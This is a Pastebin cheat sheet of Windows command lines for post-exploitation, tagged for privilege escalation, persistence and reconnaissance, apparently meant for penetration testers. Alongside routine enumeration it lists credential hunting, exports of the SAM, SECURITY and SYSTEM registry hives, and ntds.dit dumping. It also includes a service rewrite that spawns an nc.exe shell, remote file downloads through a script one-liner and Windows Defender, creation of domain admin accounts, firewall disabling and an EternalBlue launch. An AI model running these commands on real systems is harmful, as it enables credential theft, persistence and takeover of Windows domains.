Advertisement
Sweetening

command prompt

Nov 27th, 2023
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.67 KB | None | 0 0
  1. # windows
  2.  
  3. #plateform/windows #target/local #cat/PRIVESC
  4.  
  5. ## get info system
  6. ```
  7. systeminfo
  8. ```
  9.  
  10. ## get info system limited
  11. ```
  12. systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
  13. ```
  14.  
  15. ## find passwords
  16. ```
  17. findstr /si 'password' *.txt *.xml *.docx
  18. ```
  19.  
  20. ## find passwords - group policy preference (ms14-025)
  21. ```
  22. findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
  23. ```
  24.  
  25. ## get patches
  26. ```
  27. wmic qfe get Caption,Description,HotFixID,InstalledOn
  28. ```
  29.  
  30. ## get hostname
  31. ```
  32. hostname
  33. ```
  34.  
  35. ## get computer name
  36. ```powershell
  37. $env:computername
  38. ```
  39.  
  40. ## show environment - List all environment variables
  41. ```
  42. set
  43. ```
  44.  
  45. ## dns request for DC
  46. ```
  47. nslookup -type=any <userdnsdomain>.
  48. ```
  49.  
  50. ## show mounted disks
  51. ```
  52. wmic logicaldisk get caption,description,providername
  53. ```
  54.  
  55. ## show recycle bin
  56. ```
  57. dir C:\$Recycle.Bin /s /b
  58. ```
  59.  
  60. ## get architecture
  61. ```
  62. wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
  63. ```
  64.  
  65. ## list scheduled tasks
  66. ```
  67. schtasks /query /fo LIST /v
  68. ```
  69.  
  70. ## list one scheduled task
  71. ```
  72. schtasks /query /fo LIST 2>nul | findstr <taskname>
  73. ```
  74.  
  75. ## list process
  76. ```
  77. tasklist /V
  78. ```
  79.  
  80. ## list process and links to started services
  81. ```
  82. tasklist /SVC
  83. ```
  84.  
  85. ## list windows service started (1)
  86. ```
  87. net start
  88. ```
  89.  
  90. ## list services (2)
  91. ```
  92. wmic service list brief
  93. ```
  94.  
  95. ## list services (3)
  96. ```
  97. sc query #List of services
  98. ```
  99.  
  100. ## list installed software (1)
  101. ```
  102. dir /a "C:\Program Files"
  103. ```
  104.  
  105. ## list installed software (2)
  106. ```
  107. dir /a "C:\Program Files (x86)"
  108. ```
  109.  
  110. ## list installed software (3)
  111. ```
  112. reg query HKEY_LOCAL_MACHINE\SOFTWARE
  113. ```
  114.  
  115. ## show lsa cached credentials value
  116. ```
  117. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
  118. ```
  119.  
  120. ## register query word password (1)
  121. ```
  122. reg query HKLM /f password /t REG_SZ /s
  123. ```
  124.  
  125. ## register query word password (2)
  126. ```
  127. reg query HKCU /f password /t REG_SZ /s
  128. ```
  129.  
  130. ## register query extract SAM
  131.  
  132. When the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.
  133.  
  134. ```
  135. reg save HKLM\SAM 'C:\Windows\Temp\sam.save'
  136. reg save HKLM\SECURITY 'C:\Windows\Temp\security.save'
  137. reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'
  138. ```
  139.  
  140. ## create shadow copy
  141. ```
  142. wmic shadowcopy call create Volume='C:\'
  143. ```
  144.  
  145. ## list shadow copy
  146. ```
  147. vssadmin list shadows
  148. ```
  149.  
  150. ## check service privilege
  151. ```
  152. accesschk.exe /accepteula -ucqv <service_name>
  153. ```
  154.  
  155. ## reconfigure service
  156. ```
  157. sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe"
  158. ```
  159.  
  160. ## change service
  161. ```
  162. sc config <service> obj= ".\LocalSystem" password= ""
  163. ```
  164.  
  165. ## start service
  166. ```
  167. net start <service>
  168. ```
  169.  
  170. ## check permission (1)
  171. ```
  172. accesschk.exe /accepteula -dqv "<file>"
  173. ```
  174.  
  175. ## check permission (2)
  176. ```
  177. cacls "<file>"
  178. ```
  179.  
  180. ## find weak folder permission
  181. ```
  182. accesschk.exe -uwdqs Users <c>:\
  183. ```
  184.  
  185. ## find weak file permission
  186. ```
  187. accesschk.exe -uwqs Users <c>:\
  188. ```
  189.  
  190. % windows, download
  191.  
  192. ## VBS download file script
  193. #cat/ATTACK/FILE_TRANSFERT
  194. ```
  195. echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js <file_url> > <downloaded_file>
  196. ```
  197.  
  198. % windows, users
  199.  
  200. ## add user
  201. #cat/PERSIST
  202. ```
  203. net user <username> <password> /ADD
  204. ```
  205.  
  206. ## add user to domain
  207. #cat/PERSIST
  208. ```
  209. net user <username> <password> /ADD /DOMAIN
  210. ```
  211.  
  212. ## add user as admin
  213. #cat/PERSIST
  214. ```
  215. net localgroup administrators <username> /add
  216. ```
  217.  
  218. ## run as over user
  219. #cat/PRIVESC
  220. ```
  221. runas /user:<domain>\<user> cmd.exe
  222. ```
  223.  
  224. ## whoami - All info about me, take a look at the enabled tokens
  225. #cat/PRIVESC
  226. ```
  227. whoami /all
  228. ```
  229.  
  230. ## whoami privilegied
  231. #cat/PRIVESC
  232. ```
  233. whoami /priv #Show only privileges
  234. ```
  235.  
  236. ## list all users
  237. #cat/PRIVESC
  238. ```
  239. net users
  240. ```
  241.  
  242. ## list domain admins (fr)
  243. #plateform/windows #target/local #cat/RECON
  244. ```
  245. net group "Admins du domaine"
  246. ```
  247.  
  248. ## infos about a user
  249. #cat/RECON
  250. ```
  251. net user <username>
  252. ```
  253.  
  254. ## infos on a Administrator and retrieve SID
  255. ```powershell
  256. [wmi] "Win32_userAccount.Domain='<computer_name>',Name='Administrator'"
  257. ```
  258.  
  259. ## infos about password policy
  260. #cat/RECON
  261. ```
  262. net accounts
  263. ```
  264.  
  265. ## who logged in
  266. #cat/PRIVESC
  267. ```
  268. qwinsta
  269. ```
  270.  
  271. ## List credentials
  272. #cat/POSTEXPLOIT/CREDS_RECOVER
  273. ```
  274. cmdkey /list
  275. ```
  276.  
  277. ## show local groups
  278. #cat/RECON
  279. ```
  280. net localgroup
  281. ```
  282.  
  283. ## show specific local group
  284. ```
  285. net localgroup <group_name>
  286. ```
  287.  
  288. ## show domain groups
  289. ```
  290. net group /domain
  291. ```
  292.  
  293. ## show domain group users
  294. ```
  295. net group /domain <domain_group_name>
  296. ```
  297.  
  298. % windows, domain infos
  299.  
  300. ## get domain name
  301. ```
  302. echo %USERDOMAIN%
  303. ```
  304.  
  305. ## get domain name (2)
  306. ```
  307. echo %USERDNSDOMAIN%
  308. ```
  309.  
  310. ## get computer domain name (3)
  311. ```
  312. systeminfo | findstr /B /C:"Domain"
  313. ```
  314.  
  315. ## get name of the DC
  316. ```
  317. echo %logonserver%
  318. ```
  319.  
  320. ## get name of the dc (2)
  321. ```
  322. set logonserver #Get name of the domain controller
  323. ```
  324.  
  325. ## list of domain groups
  326. ```
  327. net groups /domain
  328. ```
  329.  
  330. ## list of computer connected to the domain
  331. ```
  332. net group "domain computers" /domain
  333. ```
  334.  
  335. ## List all PCs of the domain
  336. ```
  337. net view /domain
  338. ```
  339.  
  340. ## list domain controllers
  341. ```
  342. nltest /dclist:<domain>
  343. ```
  344.  
  345. ## list pc accounts of domain controllers
  346. ```
  347. net group "Domain Controllers" /domain
  348. ```
  349.  
  350. ## List users with domain admin privileges
  351. ```
  352. net group "Domain Admins" /domain
  353. ```
  354.  
  355. ## Add user to domain admin group
  356. ```
  357. net group "Domain Admins" <username> /add /domain
  358. ```
  359.  
  360. ## Add user to domain admin group - FR
  361. ```
  362. net group "Admins du domaine" <username> /add /domain
  363. ```
  364.  
  365. ## List users that belongs to the administrators group inside the domain
  366. ```
  367. net localgroup administrators /domain
  368. ```
  369.  
  370. ## List all domain users
  371. ```
  372. net user /domain
  373. ```
  374.  
  375. ## get user domain information
  376. ```
  377. net user <username> /domain
  378. ```
  379.  
  380. ## domain password and lockout policy
  381. ```
  382. net accounts /domain
  383. ```
  384.  
  385. ## get mapping of the trust relationships
  386. ```
  387. nltest /domain_trust
  388. ```
  389.  
  390. % windows, network
  391. ## all interfaces
  392. ```
  393. ipconfig /all
  394. ```
  395.  
  396. ## print all routes
  397. ```
  398. route print
  399. ```
  400.  
  401. ## list of know hosts
  402. ```
  403. arp -a
  404. ```
  405.  
  406. ## list open ports
  407. ```
  408. netstat -ano
  409. ```
  410.  
  411. ## show hosts file
  412. ```
  413. type C:\WINDOWS\System32\drivers\etc\hosts
  414. ```
  415.  
  416. % windows, dir
  417.  
  418. ## list hidden files
  419. ```
  420. dir /a:h <path>
  421. ```
  422.  
  423. ## Recursive list
  424. ```
  425. dir /s /b
  426. ```
  427.  
  428. % windows, firewall
  429. ## show firewall state
  430. ```
  431. netsh firewall show state
  432. ```
  433.  
  434. ## show firewall config
  435. ```
  436. netsh firewall show config
  437. ```
  438.  
  439. ## turn off firewall
  440. ```
  441. NetSh Advfirewall set allprofiles state off
  442. ```
  443.  
  444. ## turn off firewall (2)
  445. ```
  446. netsh firewall set opmode disable
  447. ```
  448.  
  449. ## turn on firewall
  450. ```
  451. NetSh Advfirewall set allprofiles state on
  452. ```
  453.  
  454. ## firewall open port RDP
  455. ```
  456. netsh firewall add portopening TCP 3389 "Remote Desktop"
  457. ```
  458.  
  459. % windows, ntds.dit
  460. ## dump ntds.dit (Windows >= 2008 server) - method 1
  461. ```
  462. ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
  463. ```
  464. ## dump ntds.dit (Windows >= 2008 server) - method 2
  465. ```
  466. esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
  467. ```
  468. ## dump ntds.dit (Windows <= 2003 server)
  469. ```
  470. net start vss && vssadmin create shadow /for=c: && vssadmin list shadows && copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
  471. ```
  472.  
  473. % windows, smb, share
  474. ## list of computer
  475. ```
  476. net view
  477. ```
  478.  
  479. ## list of computer shares on the domain
  480. ```
  481. net view /all /domain <domain_name>
  482. ```
  483.  
  484. ## list share of a computer
  485. ```
  486. net view \\<ip> \ALL
  487. ```
  488.  
  489. ## mount share locally
  490. ```
  491. net use x: \\<ip>\<share_name>
  492. ```
  493.  
  494. ## check current share
  495. ```
  496. net share
  497. ```
  498.  
  499. % windows, file, download
  500. ## windows download file with windows defender
  501. ```
  502. "c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url <url> -path <result_file>
  503. ```
  504.  
  505. ## windows download file with windows defender
  506. ```
  507. mpcmdrun.exe -DownloadFile -url <url> -path <result_file>
  508. ```
  509.  
  510. % windows, active directory, dns
  511.  
  512. ## find AD IP - show domain name and dns
  513. ```
  514. nmcli dev show <interface>
  515. ```
  516.  
  517. ## nslookup AD - domain
  518. ```
  519. nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain_name>
  520. ```
  521.  
  522. % windows, active directory
  523.  
  524. ## enable sid history
  525. Enable history on source domain for target domain (useful for forest extra SID exploitation)
  526. ```
  527. netdom trust <source_domain> /d:<target_domain> /enablesidhistory:yes
  528. ```
  529.  
  530. % windows, cve
  531. ## windows eternal blue - smb - ms17-010
  532. ```
  533. msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue"
  534. ```
  535.  
  536. = interface: eth0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement